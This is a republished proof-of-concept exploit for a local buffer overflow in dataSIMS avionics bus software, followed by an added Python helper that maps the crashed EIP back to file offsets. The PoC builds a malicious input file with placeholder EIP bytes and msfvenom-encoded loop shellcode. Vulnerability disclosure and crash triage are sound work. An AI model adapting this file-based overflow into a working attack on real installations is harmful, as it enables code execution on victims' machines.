dataSIMS Avionics ARINC 664-1 – Local Buffer Overflow (PoC) – Digitalmunition
Published on February 19th, 2021

# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
# Exploit Author:  Kağan Çapar
# Date: 2020-02-17
# Vendor Homepage: https://www.ddc-web.com/
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
# Version: 4.5.3
# Tested On: Windows 10 Enterprise (x64)
# About the software:
# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
# About ARINC 664-1:
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations.
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

# Register state observed in the debugger after the generated file is loaded:
#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330     ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246

#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance exception on 42424242 (C0000005, EXCEPTION_ACCESS_VIOLATION)!

# The result file is written in binary mode so every byte below reaches the
# parser unchanged (no newline or encoding translation).
file = open("milstd1553result.txt", "wb")
junk = b"\x41" * 600                      # filler preceding the corrupted region
align = b"\x32" * 4 + b"\x31" * 4
prop = b"\x43" * 380
imp = b"\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"
imp2 = b"\x61\x72\x61\x63\x61\x67\x131\x7a"   # "\x131" is \x13 followed by the character "1"

# EIP overwrite: these four bytes end up in EIP (0x42424242 in the crash above)
overwrite = b"\x42" * 4

# Payload size: 29 bytes
# Final size of py file: 160 bytes

# msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai

buf =  b""
buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33"
buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9"
buf += b"\x8b\x7c\x9c"

win32 = junk + align + prop + imp + imp2 + overwrite + buf

print(len(win32))
file.write(win32)
file.close()
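When triaging a crash like the one in the register dump above, the first question is whether the value in EIP really comes from the bytes the analyst controls, and from which part of the file. The helper below is an added example, not part of the PoC or of the vendor's software: it rebuilds the file layout from the same segment lengths as the PoC (the 29-byte payload is replaced by a zero-filled placeholder of equal length, and the segment names are the PoC's variable names), then maps a reported EIP back to a byte offset and the segment that offset falls in.

```python
import struct

# Constructed to mirror the PoC layout; the payload is a placeholder of the same length.
SEGMENTS = [
    ("junk", b"\x41" * 600),
    ("align", b"\x32" * 4 + b"\x31" * 4),
    ("prop", b"\x43" * 380),
    ("imp", b"\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"),
    # "\x131" parses as \x13 followed by the character "1", exactly as in the PoC source
    ("imp2", b"\x61\x72\x61\x63\x61\x67\x131\x7a"),
    ("overwrite", b"\x42" * 4),
    ("payload", b"\x00" * 29),   # placeholder, not the real shellcode bytes
]


def build_file(segments):
    """Concatenate the segments; return (data, layout) where layout lists
    (name, start, end) with end exclusive, i.e. each segment's byte range."""
    data = b""
    layout = []
    for name, chunk in segments:
        layout.append((name, len(data), len(data) + len(chunk)))
        data += chunk
    return data, layout


def find_eip_offset(data, eip):
    """Offset of the little-endian encoding of the crashed EIP in the file, or None
    if those four bytes do not occur (the crash would then not be a direct overwrite)."""
    needle = struct.pack("<I", eip)
    off = data.find(needle)
    return None if off < 0 else off


def segment_at(layout, offset):
    """Name of the segment whose byte range contains offset, or None."""
    for name, start, end in layout:
        if start <= offset < end:
            return name
    return None


def triage(eip):
    """Map a crash EIP back to the generated file: total length, byte offset of the
    EIP bytes, and which PoC segment they belong to."""
    data, layout = build_file(SEGMENTS)
    off = find_eip_offset(data, eip)
    return {
        "file_length": len(data),
        "eip_offset": off,
        "segment": None if off is None else segment_at(layout, off),
    }


if __name__ == "__main__":
    # EIP value taken from the register dump in the PoC comments
    print(triage(0x42424242))
```

For the PoC's own EIP of 0x42424242 the lookup lands at offset 1007 inside the `overwrite` segment and the rebuilt file is 1040 bytes long, matching what the PoC prints; an EIP that maps into `junk` or `prop` instead would indicate the fault address came from filler, and an EIP that does not appear in the file at all points to an indirect corruption rather than a plain return-address overwrite.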